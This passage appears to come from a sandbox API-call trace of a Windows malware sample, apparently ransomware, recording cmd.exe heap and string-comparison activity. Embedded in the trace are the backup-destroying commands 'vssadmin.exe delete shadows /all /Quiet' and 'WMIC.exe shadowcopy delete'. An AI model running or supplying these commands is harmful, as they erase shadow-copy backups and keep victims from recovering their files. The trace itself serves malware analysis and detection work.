(_String1="IF", _String2="vssadmin.exe") returned -13 [0040.754] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0040.754] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0040.754] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0040.754] GetProcessHeap () returned 0x4e0000 [0040.754] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0) returned 0x4fbad0 [0040.754] GetProcessHeap () returned 0x4e0000 [0040.754] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f6540 [0040.754] GetProcessHeap () returned 0x4e0000 [0040.754] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x4f8970 [0040.755] GetConsoleTitleW (in: lpConsoleTitle=0x31f5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0040.756] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0040.756] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0040.756] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0040.756] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0040.756] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0040.756] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0040.756] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0040.756] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0040.756] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0040.756] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0040.756] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0040.756] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0040.756] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0040.756] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0040.756] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0040.756] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0040.756] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0040.756] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0040.756] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0040.756] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0040.756] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0040.756] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0040.756] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0040.756] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0040.756] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0040.756] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0040.756] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0040.756] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0040.756] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0040.756] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0040.756] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0040.756] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0040.756] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0040.756] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0040.756] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0040.756] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0040.757] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0040.757] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0040.757] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0040.757] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0040.757] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0040.757] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0040.757] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0040.757] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0040.757] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0040.757] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0040.757] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0040.757] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0040.757] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0040.757] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0040.757] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0040.757] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0040.757] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0040.757] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0040.757] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0040.757] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0040.757] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0040.757] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0040.757] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0040.757] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0040.757] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0040.757] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0040.757] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0040.757] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0040.757] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0040.757] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0040.757] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0040.757] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0040.757] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0040.757] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0040.758] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0040.758] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0040.758] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0040.758] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0040.758] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0040.758] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0040.758] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0040.758] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0040.758] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0040.758] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0040.758] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0040.758] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0040.758] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0040.758] GetProcessHeap () returned 0x4e0000 [0040.758] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4fbb90 [0040.758] GetProcessHeap () returned 0x4e0000 [0040.758] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4fbdb0 [0040.758] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0040.759] GetProcessHeap () returned 0x4e0000 [0040.759] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x420) returned 0x4e1320 [0040.759] SetErrorMode (uMode=0x0) returned 0x0 [0040.759] SetErrorMode (uMode=0x1) returned 0x0 [0040.759] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e1330, lpFilePart=0x31ee40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31ee40*="Desktop") returned 0x25 [0040.759] SetErrorMode (uMode=0x0) returned 0x1 [0040.759] GetProcessHeap () returned 0x4e0000 [0040.759] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4e1320, Size=0x76) returned 0x4e1320 [0040.759] GetProcessHeap () returned 0x4e0000 [0040.759] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4e1320) returned 0x76 [0040.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0040.759] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.759] GetProcessHeap () returned 0x4e0000 [0040.759] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x128) returned 0x4fbe20 [0040.759] GetProcessHeap () returned 0x4e0000 [0040.759] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x240) returned 0x4fbf50 [0040.765] GetProcessHeap () returned 0x4e0000 [0040.765] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4fbf50, Size=0x12a) returned 0x4fbf50 [0040.765] GetProcessHeap () returned 0x4e0000 [0040.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4fbf50) returned 0x12a [0040.765] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.765] GetProcessHeap () returned 0x4e0000 [0040.765] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe8) returned 0x4fc090 [0040.765] GetProcessHeap () returned 0x4e0000 [0040.765] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4fc090, Size=0x7e) returned 0x4fc090 [0040.765] GetProcessHeap () returned 0x4e0000 [0040.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4fc090) returned 0x7e [0040.766] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x31ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ebb0) returned 0xffffffffffffffff [0040.766] GetLastError () returned 0x2 [0040.767] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x31ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ebb0) returned 0xffffffffffffffff [0040.767] GetLastError () returned 0x2 [0040.767] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x31ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ebb0) returned 0xffffffffffffffff [0040.767] GetLastError () returned 0x2 [0040.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x31ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ebb0) returned 0x4fc120 [0040.767] GetProcessHeap () returned 0x4e0000 [0040.767] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x28) returned 0x4f4600 [0040.767] FindClose (in: hFindFile=0x4fc120 | out: hFindFile=0x4fc120) returned 1 [0040.767] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0040.767] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0040.767] GetConsoleTitleW (in: lpConsoleTitle=0x31f100, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0040.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x31eeb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31ee78 | out: lpAttributeList=0x31eeb8, lpSize=0x31ee78) returned 1 [0040.767] UpdateProcThreadAttribute (in: lpAttributeList=0x31eeb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x31ee68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31eeb8, lpPreviousValue=0x0) returned 1 [0040.767] GetStartupInfoW (in: lpStartupInfo=0x31efd0 | out: lpStartupInfo=0x31efd0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0040.767] GetProcessHeap () returned 0x4e0000 [0040.768] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f4630 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0040.768] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0040.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0040.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0040.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0040.769] GetProcessHeap () returned 0x4e0000 [0040.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4630 | out: hHeap=0x4e0000) returned 1 [0040.769] GetProcessHeap () returned 0x4e0000 [0040.769] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4fc120 [0040.769] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.770] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31eef0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31eea0 | out: lpCommandLine="vssadmin.exe delete shadows /all /Quiet", lpProcessInformation=0x31eea0*(hProcess=0x54, hThread=0x50, dwProcessId=0xb34, dwThreadId=0xb38)) returned 1 [0040.779] CloseHandle (hObject=0x50) returned 1 [0040.779] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.779] GetProcessHeap () returned 0x4e0000 [0040.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4face0 | out: hHeap=0x4e0000) returned 1 [0040.779] GetEnvironmentStringsW () returned 0x4face0* [0040.779] GetProcessHeap () returned 0x4e0000 [0040.779] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4f8b10 [0040.779] FreeEnvironmentStringsW (penv=0x4face0) returned 1 [0040.779] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0075.289] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x31ede8 | out: lpExitCode=0x31ede8*=0x0) returned 1 [0075.289] CloseHandle (hObject=0x54) returned 1 [0075.289] _vsnwprintf (in: _Buffer=0x31f058, _BufferCount=0x13, _Format="%08X", _ArgList=0x31edf8 | out: _Buffer="00000000") returned 8 [0075.289] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0075.290] GetProcessHeap () returned 0x4e0000 [0075.290] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8b10 | out: hHeap=0x4e0000) returned 1 [0075.290] GetEnvironmentStringsW () returned 0x4fc140* [0075.290] GetProcessHeap () returned 0x4e0000 [0075.290] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4f8b10 [0075.290] FreeEnvironmentStringsW (penv=0x4fc140) returned 1 [0075.290] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0075.290] GetProcessHeap () returned 0x4e0000 [0075.290] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8b10 | out: hHeap=0x4e0000) returned 1 [0075.290] GetEnvironmentStringsW () returned 0x4fc140* [0075.290] GetProcessHeap () returned 0x4e0000 [0075.290] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4f8b10 [0075.290] FreeEnvironmentStringsW (penv=0x4fc140) returned 1 [0075.290] GetProcessHeap () returned 0x4e0000 [0075.290] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fc120 | out: hHeap=0x4e0000) returned 1 [0075.290] DeleteProcThreadAttributeList (in: lpAttributeList=0x31eeb8 | out: lpAttributeList=0x31eeb8) [0075.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0075.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.290] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0075.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0075.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0075.291] SetConsoleInputExeNameW () returned 0x1 [0075.291] GetConsoleOutputCP () returned 0x1b5 [0075.291] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0075.291] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0075.291] exit (_Code=0) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x493c2000" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C WMIC.exe shadowcopy delete " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0xb14 [0041.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fed0 | out: lpSystemTimeAsFileTime=0x16fed0*(dwLowDateTime=0x1b84280, dwHighDateTime=0x1d53bb2)) [0041.062] GetCurrentProcessId () returned 0xb10 [0041.062] GetCurrentThreadId () returned 0xb14 [0041.062] GetTickCount () returned 0x19e60 [0041.062] QueryPerformanceCounter (in: lpPerformanceCount=0x16fed8 | out: lpPerformanceCount=0x16fed8*=16133084235) returned 1 [0041.064] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000 [0041.064] __set_app_type (_Type=0x1) [0041.064] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0 [0041.064] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0 [0041.065] GetCurrentThreadId () returned 0xb14 [0041.065] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb14) returned 0x3c [0041.065] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0041.065] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0041.065] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0041.098] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.098] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fe68 | out: phkResult=0x16fe68*=0x0) returned 0x2 [0041.098] VirtualQuery (in: lpAddress=0x16fe50, lpBuffer=0x16fdd0, dwLength=0x30 | out: lpBuffer=0x16fdd0*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.098] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fdd0, dwLength=0x30 | out: lpBuffer=0x16fdd0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.098] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fdd0, dwLength=0x30 | out: lpBuffer=0x16fdd0*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.098] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16fdd0, dwLength=0x30 | out: lpBuffer=0x16fdd0*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0041.098] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fdd0, dwLength=0x30 | out: lpBuffer=0x16fdd0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0041.098] GetConsoleOutputCP () returned 0x1b5 [0041.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0041.098] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1 [0041.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.098] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0041.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0041.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.099] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0041.099] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.099] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0041.099] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.100] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0041.100] GetEnvironmentStringsW () returned 0x348af0* [0041.100] GetProcessHeap () returned 0x330000 [0041.100] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x349580 [0041.100] FreeEnvironmentStringsW (penv=0x348af0) returned 1 [0041.100] GetProcessHeap () returned 0x330000 [0041.100] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x8) returned 0x348370 [0041.100] GetEnvironmentStringsW () returned 0x348af0* [0041.100] GetProcessHeap () returned 0x330000 [0041.100] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x34a010 [0041.100] FreeEnvironmentStringsW (penv=0x348af0) returned 1 [0041.100] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ed28 | out: phkResult=0x16ed28*=0x44) returned 0x0 [0041.100] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x18, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.100] RegQueryValueExW (in: hKey=0x44, 